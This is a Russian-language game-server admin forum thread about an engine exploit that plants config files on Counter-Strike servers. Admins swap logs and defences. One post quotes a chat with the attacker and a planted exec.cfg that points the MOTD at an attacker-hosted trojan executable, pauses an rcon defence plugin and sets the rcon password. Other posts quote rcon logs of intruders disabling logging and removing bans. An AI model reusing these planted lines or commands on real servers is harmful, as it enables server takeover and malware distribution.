Правила форума Гаранты форума
Размещение рекламы AMX-X компилятор

Здравствуйте, гость Вход | Регистрация

Наши новости:

14-дек
24-апр
10-апр
11-апр

> Важная информация

Перед тем как создать тему или задать вопрос, ознакомьтесь с данной темой, там собраны наиболее распространенные уязвимости и способы устранения.
Так же не поленитесь воспользоваться поиском, вполне возможно, что ваш вопрос уже поднимался на форуме.
При создании новой темы уделите внимание ее названию, оно должно кратко описывать суть вашего вопроса/проблемы. Все вновь созданные темы с названиями "Помогите", "Объясните", "Подскажите" и т.д. будут удалены, а их авторы наказаны.
23 страниц V  « 20 21 22 »

Залили на сервер exec.cfg

Статус пользователя Vitaliy
сообщение 27.6.2013, 10:15
Сообщение #401


Стаж: 14 лет

Сообщений: 2431
Благодарностей: 526
Полезность: 609

Меценат Меценат

Kristl,
Хочу заметить что сайтов с раздачей минимум 2, первый лежит, а второй я потерял айпи
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Serj
сообщение 27.6.2013, 10:25
Сообщение #402


Стаж: 15 лет

Сообщений: 855
Благодарностей: 266
Полезность: 198

Смысл паниковать? Не проще ли, пока маздан не пофиксит свой плаг на орфее, установить фикс с 15 страницы? Конфиги будут удаляться, мотд переписываться не будет. Или всем в кайф писать "ой, меня поимели", "опять та же ерунда" и т.д.? Зачем мусолить одно и то же, если последствия использования сплоита известны уже во всех подробностях?
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
Поблагодарили 1 раз
   + Цитировать сообщение
Статус пользователя mazdan
сообщение 27.6.2013, 21:04
Сообщение #403


Иконка группы

Стаж: 15 лет

Сообщений: 7566
Благодарностей: 5437
Полезность: 1305

Serj, не факт что с ним обходят так-то =)
Ны выходных гляну что там у меня с ним.
Цитата
Line 1662: L 05/31/2013 - 14:53:45: No rule BLOCK custom.hp2
Line 3288: L 06/24/2013 - 09:25:02: Rule [#7] BLOCK addons\amxmodx\configs\maps\prefix_de.cfg
Line 3300: L 06/24/2013 - 13:44:00: Rule [#7] BLOCK addons\amxmodx\configs\maps\main.cfg
Line 3323: L 06/25/2013 - 00:26:34: Rule [#7] BLOCK addons\amxmodx\configs\maps\main.cfg
Line 3403: L 06/26/2013 - 06:59:41: Rule [#7] BLOCK addons\amxmodx\configs\maps\prefix_cs.cfg
Line 3422: L 06/26/2013 - 15:30:09: Rule [#7] BLOCK addons\amxmodx\configs\maps\prefix_de.cfg
Line 3451: L 06/27/2013 - 01:48:56: Rule [#7] BLOCK addons\amxmodx\configs\maps\main.cfg
Line 3468: L 06/27/2013 - 09:47:10: Rule [#7] BLOCK addons\amxmodx\configs\maps\main.cfg


Подозреваю, что он просто не у всех собственно работает. А Zeal просто прикрутил его к новому прокси-листу или типа того и пульнул по всем серверам. Ну или в самом деле новый сплойт, конечно :)


Не пишите мне в ЛС. Пишите на почту. В ЛС я пропускаю сообщения.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя ck001ru
сообщение 28.6.2013, 5:10
Сообщение #404


Стаж: 13 лет

Сообщений: 35
Благодарностей: 5
Полезность: 89

Насчёт UMM, он использует папку maps в своей папке (umm),а не в папке configs.Наверное,файлы в папке из нашего случая читаются самим amx mod.
Насчёт прав на папки,думаю,это поможет! Имеет смысл, но по сути эксплойт может залить любой файл любого содержания в любую папку директории cstrike.. и вдруг смогут залить файл,запись которого нужна (например, maplast.ini) и тогда измение прав будет не вариантом..
Думаю,стоит проверить, отключив закачку файлов на сервер (sv_allowupload 0)но этот метод не удобен,так как не хочется видеть один и тот же спрэй у всех.

Переписка с одним из тех,кто заливает эту чушь на сервера
-------------------------------------->-
сК (09:59:29 24/06/2013)
Привет! ты тут?

--------------------------------------<-
ZeaL (09:59:42 24/06/2013)
тут

-------------------------------------->-
сК (10:00:22 24/06/2013)
Ништяк) слушай,можешь мне помочь?

--------------------------------------<-
ZeaL (10:00:30 24/06/2013)
конечно)

-------------------------------------->-
сК (10:01:23 24/06/2013)
Отлично! Не мойму,как меняют motd.txt мне на сервере( не знаю что ты там рекламируешь... но блин сам знаешь неприятно( если не хочешь рассказывать как,скажи,как защититься?)

--------------------------------------<-
ZeaL (10:03:21 24/06/2013)
мотд в данный момент меняется, 25% серверов от всего мира с моим motd. защитится не знаю как. юзается бага в движке.

-------------------------------------->-
сК (10:04:25 24/06/2013)
"в данный момент меняется" - это что значит? я только что изменил его обратно) не знаешь,с нового протокола можно изменить? Ты зашёл как ID_LAN
L 06/24/2013 - 09:43:32: [DPROTO]: Client 5 - Set AuthIdType 10 [dproto]; pClient = 0xb3a579cc
L 06/24/2013 - 09:43:32: "Code by ZeaL<8912><VALVE_ID_LAN><>" connected, address "31.200.239.15:27001"
L 06/24/2013 - 09:43:33: "Beavis<8911><STEAM_0:0:692960117><TERRORIST>" triggered "Spawned_With_The_Bomb"
L 06/24/2013 - 09:43:35: World triggered "Round_Start"

--------------------------------------<-
ZeaL (10:04:51 24/06/2013)
перезапусти карту и посмотри сново на мотд, результат скинь суда.

--------------------------------------<-
ZeaL (10:06:10 24/06/2013)
'в данный момент меняется' - это что значит?

мой софт в данный момент разсылает специфический пакет на все сервера мира. твой сервер видимо в списке

--------------------------------------<-
ZeaL (10:06:37 24/06/2013)
ты первый отписавшийся, так что я отвечу на любые вопросы)

-------------------------------------->-
сК (10:06:47 24/06/2013)
Это хорошо) А сколько всего серверов в мире примерно? )

--------------------------------------<-
ZeaL (10:07:37 24/06/2013)
сейчас 28531. из них - 50% поддаются коннекту, из вторых - 20% взламываются. под вечер будет около 35к серверов

-------------------------------------->-
сК (10:08:22 24/06/2013)
ух ты.. здорово) а то у меня в стиме только 10000 высвечиваются.. в пиратке 2000.

-------------------------------------->-
сК (10:08:41 24/06/2013)
а что за файл ты рассылаешь на скачку? ну zeal1209.no-ip.org/cstrike.exe ?

--------------------------------------<-
ZeaL (10:08:50 24/06/2013)
HLProxy

--------------------------------------<-
ZeaL (10:08:54 24/06/2013)
:-)

--------------------------------------<-
ZeaL (10:08:56 24/06/2013)
новый

-------------------------------------->-
сК (10:09:08 24/06/2013)
а что это? для чего нужен?

--------------------------------------<-
ZeaL (10:09:18 24/06/2013)
для обхода бана

--------------------------------------<-
ZeaL (10:09:28 24/06/2013)
так же юзается для флуда серверов

--------------------------------------<-
ZeaL (10:09:37 24/06/2013)
HLDS Fake и подобными программами

-------------------------------------->-
сК (10:10:56 24/06/2013)
а то у меня определился как модифицированный Win32/Delf.OLQ троянская программа.

--------------------------------------<-
ZeaL (10:11:23 24/06/2013)
это и есть трян

-------------------------------------->-
сК (10:11:26 24/06/2013)
Так то есть тема обсуждения https://c-s.net.ua/forum/topic46373s340.html но там ничё путного сказать не могут...

--------------------------------------<-
ZeaL (10:11:26 24/06/2013)
троян

-------------------------------------->-
сК (10:12:00 24/06/2013)
Ты правда не знаешь как защититься или просто ну не хочешь говорить по понятным причинам?

--------------------------------------<-
ZeaL (10:12:51 24/06/2013)
ссылка, которую вы скинули, и есть тема с данным эксплоитом. через него пилится мотд

-------------------------------------->-
сК (10:14:13 24/06/2013)
да я понял.. просто там не описано ничего.. не знаешь,если я поставлю sv_alloupload 0 то сможешь запилить?

--------------------------------------<-
ZeaL (10:14:25 24/06/2013)
честно - не знаю)

-------------------------------------->-
сК (10:14:48 24/06/2013)
хм.. т.е. в самой контре ты не особо шаришь?

--------------------------------------<-
ZeaL (10:15:05 24/06/2013)
почему

--------------------------------------<-
ZeaL (10:15:07 24/06/2013)
вполне

--------------------------------------<-
ZeaL (10:15:15 24/06/2013)
я написал же весь софт)

--------------------------------------<-
ZeaL (10:15:31 24/06/2013)
но что изменит та команда не вкурсе

-------------------------------------->-
сК (10:16:09 24/06/2013)
ну просто раз ты используешь дыру - ты должен знать,как она работает.. данная команда запрещает игрокам заливать файлы на сервер (например,логотипы)

--------------------------------------<-
ZeaL (10:17:55 24/06/2013)
заливаются конфиги в папку addonsеще в metamod. Необходимо почистить их. Но даже если вы их удалите они сново запилятся на следующем шаге (он будет через минут 30). Как вариант - добавить в бан меня. На счет команды sv_alloupload не знаю, попробуйте возможно поможет.

-------------------------------------->-
сК (10:20:09 24/06/2013)
мой сервер на линуксе.я поставил минимальные права на папку метамод и конфиг exec.cfg не появился.. но не ставил права на папку maps и там появился с таким содержанием:
motdfile motd.txt
motd_write http://zeal1209.no-ip.org/cstrike.exe

amxx pause rcon_defencer.amxx

rcon_password zhenya

--------------------------------------<-
ZeaL (10:20:39 24/06/2013)
попробуйте поставить на motd.txt только чтение

--------------------------------------<-
ZeaL (10:21:57 24/06/2013)
может любой файл залить с любым содержанием

-------------------------------------->-
сК (10:23:01 24/06/2013)
а почему же тогда все заливают одно и тоже?

--------------------------------------<-
ZeaL (10:23:29 24/06/2013)
мне конкретно нужен motd

--------------------------------------<-
ZeaL (10:23:37 24/06/2013)
что заливают другие я не вкурсе)

--------------------------------------<-
ZeaL (10:23:50 24/06/2013)
эксплоит взял у 2010KOHTEP, и переделал под себя

-------------------------------------->-
сК (10:24:56 24/06/2013)
мне заливали уже 4 раза за два месяца.. все одно и тоже: exec.cfg в метамод, префиксы карт в maps и меня мотд.А где можно достать данный эксплойт?

--------------------------------------<-
ZeaL (10:25:32 24/06/2013)
в открытом доступе его нет

-------------------------------------->-
сК (10:25:48 24/06/2013)
в deep web'e?

--------------------------------------<-
ZeaL (10:25:56 24/06/2013)
?

-------------------------------------->-
сК (10:26:06 24/06/2013)
сколько тебе лет?

--------------------------------------<-
ZeaL (10:26:13 24/06/2013)
17

-------------------------------------->-
сК (10:26:28 24/06/2013)
ок)) мне 24.это глубинный интернет.. где собрано всё запретное..

ZeaL (10:26:45 24/06/2013)
не слышал

-------------------------------------->-
сК (10:27:38 24/06/2013)
полазий,может,понравится)) можешь скинуть этот эксплойт? неважно оригинал или переделку?

--------------------------------------<-
ZeaL (10:28:04 24/06/2013)
нет, скинуть не могу. без обид)

-------------------------------------->-
сК (10:40:40 24/06/2013)
А если я запрещу коннектится игрокам с ID_LAN, как у тебя? поможет чем-нибудь?



Кстати, ни кто не знает,если Valve залатали эту дыру в новом билде,который устаналивается через Steamcmd, то старый они уже изменять не будут и просто потом прикроют HLDSupdatetool ? И.. ждём ли мы dproto на новый билд? :)

Отредактировал: ck001ru, - 28.6.2013, 5:12
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя mazdan
сообщение 28.6.2013, 7:03
Сообщение #405


Иконка группы

Стаж: 15 лет

Сообщений: 7566
Благодарностей: 5437
Полезность: 1305

Цитата
Кстати, ни кто не знает,если Valve залатали эту дыру в новом билде,который устаналивается через Steamcmd, то старый они уже изменять не будут и просто потом прикроют HLDSupdatetool ? И.. ждём ли мы dproto на новый билд? :)

Не знаю залатали ли, я просил их, но не помню был ли callback. Возможно, еще Крок писал тоже им по этому поводу.

Один из вариантов защиты - создать пустые файлы, перезаписать их не могут не зависимо от прав к файлу - ограничен ов движке.


Не пишите мне в ЛС. Пишите на почту. В ЛС я пропускаю сообщения.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя noisiacs
сообщение 28.6.2013, 8:01
Сообщение #406


Стаж: 13 лет

Сообщений: 684
Благодарностей: 162
Полезность: 204

В общем задолбали меня эти файлики, поставил последний билд, буду ждать привета.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя ck001ru
сообщение 28.6.2013, 8:41
Сообщение #407


Стаж: 13 лет

Сообщений: 35
Благодарностей: 5
Полезность: 89

Цитата(mazdan @ 28.6.2013, 9:03) *
Один из вариантов защиты - создать пустые файлы, перезаписать их не могут не зависимо от прав к файлу - ограничен ов движке.

>>
Цитата
Насчёт прав на папки,думаю,это поможет! Имеет смысл, но по сути эксплойт может залить любой файл любого содержания в любую папку директории cstrike.. и вдруг смогут залить файл,запись которого нужна (например, maplast.ini) и тогда измение прав будет не вариантом..

Понятно же,что чуть стоит изменить эскплойт и можно залить другой файл.. А конфигов очень много запускается при старте карты..
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Metal Messiah
сообщение 28.6.2013, 16:10
Сообщение #408


Иконка группы

Стаж: 13 лет

Сообщений: 2457
Благодарностей: 1482
Полезность: 770

HostGame.cf
Цитата(Kristl)
ахахаха видали чё пишет ))) http://31.200.239.201/

Красавчег!
1 сервер я ему прощаю, все таки кое-чему научился и много идей появилось. А за остальные - мои слова в силе :)

Решение проблемы: все проблемные папки делаются chown root и уираются права на запись не владельцем, то же с MOTD. Проверено.


Полезные публикации - ссылки у меня в профиле. Ссылка на плагин против спама на сервере StopServerSpam там же.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
green777
сообщение 29.6.2013, 16:05
Сообщение #409
Стаж: 15 лет

Сообщений: 377
Благодарностей: 5
Полезность: 0

Ну че фикс будет?
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя counterstrikec4
сообщение 29.6.2013, 16:36
Сообщение #410
Стаж: 15 лет

Сообщений: 191
Благодарностей: 32
Полезность: 34

Всё говорят переделать сплоит и в другие папки можно лить
ну ну, я на все папки 444 поставил кроме тех где логи идут так что если что то и зальют то уже понятно где это будет залито
на крайняк логи отключу тк они мне не особо нужны и всё и сплоит не сможет мне ни*** залить и будут думать мегахакеры а в чём дело чё за *** хе.
Люди вопрос к тем кто общается с Crock'om, он не чего не говорил про новый Dproto?
просто реально это решило бы несколько бед, хотябы бету.
Кстати я уже долго жду пока мне что то зальют а то скучно но видимо подключения этого сплоита не пренесли хакерам результат хе.

ЖДЁМС!

Отредактировал: counterstrikec4, - 29.6.2013, 16:40
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя mazdan
сообщение 29.6.2013, 17:30
Сообщение #411


Иконка группы

Стаж: 15 лет

Сообщений: 7566
Благодарностей: 5437
Полезность: 1305

Цитата(green777 @ 29.6.2013, 18:05) *
Ну че фикс будет?

Дата старта темы как бы намекает...
10.12.2012, 14:13


Не пишите мне в ЛС. Пишите на почту. В ЛС я пропускаю сообщения.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя tonline_kms65
сообщение 19.7.2013, 17:59
Сообщение #412


Стаж: 18 лет

Сообщений: 42
Благодарностей: 30
Полезность: 244

Цитата(mazdan @ 30.6.2013, 2:30) *
Дата старта темы как бы намекает...
10.12.2012, 14:13

Смысл искать дыру? Нашли одну найдут и другую.
Я предполагаю все-таки дыра не в Valve движке а в античите "csf_anticheat". По всей видимости через этот античит нашли дыру и залили на сервер трояна. Но повторюсь - без разницы где дыра. csf_anticheat это как наиболее реальный пример.
Троян самоликвидировался, или назвался по другому. Сам троян сидит где-то в контре, иначе его антивирус может поймать.
Далее поцик делает себя админом (если стоит только чтение то админ до смены карты) С правами админа можно многое натворить, если чуть-чуть подумает, то не только на серваке.

Предлагаю самый хороший вариант - дожидаетесь авторизации поцика с этим гавном и баните его навечно по STEAM_0:0:... можно через advanced_bans
Авторизации ждем обязательно!
После бана в обязательном порядке удаляем сервак и ставим по новой.( Надеюсь копии своего сервака до взлома сделать догадались) Это для полного удаления трояна.
Навряд ли он по новой полезет ломать сервак с компа, например товарища. Кто ему даст свой комп.
Хакерство уголовно наказуемо, поэтому информацию о хакерах в сеть для общего внимания.
Хорошо бы писать логи параллельно с основными с какого нибудь стороннего плагина. Иначе хакерочек может просто очистить логи и не найдете потом кто и что натворил.
Делаете примерно так, как у меня (программу не дам!)

Отредактировал: tonline_kms65, - 19.7.2013, 18:20
Прикрепленные файлы:
Прикрепленное изображение


http://kmscs.esy.es/www/new5.php
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя mazdan
сообщение 19.7.2013, 18:16
Сообщение #413


Иконка группы

Стаж: 15 лет

Сообщений: 7566
Благодарностей: 5437
Полезность: 1305

:D


Не пишите мне в ЛС. Пишите на почту. В ЛС я пропускаю сообщения.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
Поблагодарили 2 раз
   + Цитировать сообщение
Статус пользователя sergggzi
сообщение 19.7.2013, 18:53
Сообщение #414
Иконка группы

Стаж: 13 лет

Сообщений: 6536
Благодарностей: 6222
Полезность: 807

Цитата(mazdan @ 19.7.2013, 18:16) *
:D

слов нет..... )))
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя imba
сообщение 19.7.2013, 18:57
Сообщение #415
Стаж: 16 лет

Сообщений: 1677
Благодарностей: 735
Полезность: 571

пацан дал расклад )))


!
Запрет на ответ в темах до: 10.11.29392, 21:09
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя tonline_kms65
сообщение 19.7.2013, 20:04
Сообщение #416


Стаж: 18 лет

Сообщений: 42
Благодарностей: 30
Полезность: 244

Хорошо бы писать логи параллельно с основными с какого нибудь стороннего плагина. Иначе хакерочек может просто очистить логи и не найдете потом кто и что натворил.

Пример команды от хакера на отмену ведения логов.
L 07/07/2013 - 00:47:53: Rcon: "rcon 32165465465 "wjggh" log off" from "46.4.166.137:65003"

Отредактировал: tonline_kms65, - 19.7.2013, 20:05


http://kmscs.esy.es/www/new5.php
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя IM_RAM
сообщение 19.7.2013, 20:43
Сообщение #417


Стаж: 13 лет

Сообщений: 83
Благодарностей: 16
Полезность: 153

Цитата(tonline_kms65 @ 19.7.2013, 20:04) *
Хорошо бы писать логи параллельно с основными с какого нибудь стороннего плагина. Иначе хакерочек может просто очистить логи и не найдете потом кто и что натворил.

Пример команды от хакера на отмену ведения логов.
L 07/07/2013 - 00:47:53: Rcon: "rcon 32165465465 "wjggh" log off" from "46.4.166.137:65003"



https://c-s.net.ua/forum/topic51733.html

Знаки..они повсюду!))
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Kristl
сообщение 19.7.2013, 20:53
Сообщение #418


Стаж: 14 лет

Сообщений: 329
Благодарностей: 96
Полезность: 215

Теперь заливают другие файлы cmd.cfg и pauseplugin.ini
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя tonline_kms65
сообщение 20.7.2013, 8:52
Сообщение #419


Стаж: 18 лет

Сообщений: 42
Благодарностей: 30
Полезность: 244

Цитата(Kristl @ 20.7.2013, 5:53) *
Теперь заливают другие файлы cmd.cfg и pauseplugin.ini


Да без разницы что заливают. Скоро начнут физОб'екты заливать на серваки shok.gif
Поэтому я и говорю - основная проблема это не дыры, а лохи с их неистребимым желанием как-нибудь кому-нибудь навредить. С таким желанием они любую защиту обойдут.
они готовы сутками сидеть над решением проблемы типа как завалить сервак или сайт. Необходимо избавляться от таких жалких и несчастных товарищей.
Ломать физически, как то не цивилизованно (уголовное дело), путем загона ему такого же трояна, опять же уголовно наказуемо.
Поэтому я и предлагаю бан навечно.
Но возникает проблема - отследить придурка - вот здесь как раз приходится потрудится.
Постоянная смена его ip адреса при атаке на сервер, очистка логов, насчет подмены STEAM: у меня возникают сомнения если честно. Но вполне возможно.
Поэтому и приходится сторонними программами вести так сказать оперативную разработку pardon.gif . Искать его прокол на чем нибудь. Находится 100%.
Еще один пример удаления хакерком того что насрал:
L 07/12/2013 - 07:45:05: "Player DDOS<12><STEAM_0:0:1522407310><>" connected, address "178.137.71.210:27005"
L 07/12/2013 - 07:45:13: "Player DDOS<12><STEAM_0:0:1522407310><>" entered the game
L 07/12/2013 - 07:45:15: "Player DDOS<12><STEAM_0:0:1522407310><>" joined team "CT"
L 07/12/2013 - 07:45:56: Rcon: "rcon 20220000 "dyra" echo HLSW: Test" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:16: Rcon: "rcon 20220000 "dyra" hostname "ZAEBALSIA LOMATb TVOI SERVAK"" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:21: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:21: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:34: Rcon: "rcon 20220000 "dyra" removeip 95.153.163.166" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:34: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:34: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:40: Rcon: "rcon 20220000 "dyra" removeip 178.90.120.150" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:40: Rcon: "rcon 20220000 "dyra" removeip 128.70.157.157" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:40: Rcon: "rcon 20220000 "dyra" removeip 95.153.165.176" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:40: Rcon: "rcon 20220000 "dyra" removeip 95.142.109.218" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:40: Rcon: "rcon 20220000 "dyra" removeip 95.132.231.27" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:40: Rcon: "rcon 20220000 "dyra" removeip 95.79.97.147" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:40: Rcon: "rcon 20220000 "dyra" removeip 94.20.170.158" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:40: Rcon: "rcon 20220000 "dyra" removeip 92.248.136.160" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:40: Rcon: "rcon 20220000 "dyra" removeip 88.206.89.114" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:40: Rcon: "rcon 20220000 "dyra" removeip 81.200.24.130" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:40: Rcon: "rcon 20220000 "dyra" removeip 80.241.251.66" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:40: Rcon: "rcon 20220000 "dyra" removeip 46.165.12.139" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:40: Rcon: "rcon 20220000 "dyra" removeip 5.152.178.46" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:40: Rcon: "rcon 20220000 "dyra" removeip 5.138.4.235" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:41: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:41: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:44: Rcon: "rcon 20220000 "dyra" removeip 188.187.145.52" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:44: Rcon: "rcon 20220000 "dyra" removeip 188.115.143.31" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:44: Rcon: "rcon 20220000 "dyra" removeip 178.236.140.18" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:44: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:44: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:45: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:45: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:46: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:46: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:46: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:46: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:48: Rcon: "rcon 20220000 "dyra" maps *" from "178.137.71.210:7130"
L 07/12/2013 - 07:47:54: Rcon: "rcon 20220000 "dyra" changelevel de_dust2_2x2" from "178.137.71.210:7130"

Вот еще один пример действия того же хакерка после простого бана, логи на тот момент уже отключены.
Смотрим алгоритм работы его еба....ой тупой программы (HLSW программа удаленного управления сервером):
LSW 07/12/2013 - 14:48:14: Rcon: "rcon 20220000 "dyra" echo HLSW: Test" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:17: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:17: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:38: Rcon: "rcon 20220000 "dyra" removeip 188.187.145.52" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:38: Rcon: "rcon 20220000 "dyra" removeip 188.115.143.31" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:38: Rcon: "rcon 20220000 "dyra" removeip 178.236.140.18" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:38: Rcon: "rcon 20220000 "dyra" removeip 128.70.157.157" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:38: Rcon: "rcon 20220000 "dyra" removeip 80.241.251.66" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:38: Rcon: "rcon 20220000 "dyra" removeip 5.138.4.235" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:38: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:38: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:41: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:41: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:41: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:41: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:41: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:41: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:42: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:42: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:42: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:42: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:42: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:42: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:42: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:42: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:42: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:42: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:43: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:43: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:43: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:43: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:43: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:43: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:43: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:43: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:43: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:43: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:44: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:44: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:44: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:44: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:44: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:44: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:44: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:44: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:44: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:44: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:45: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:45: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
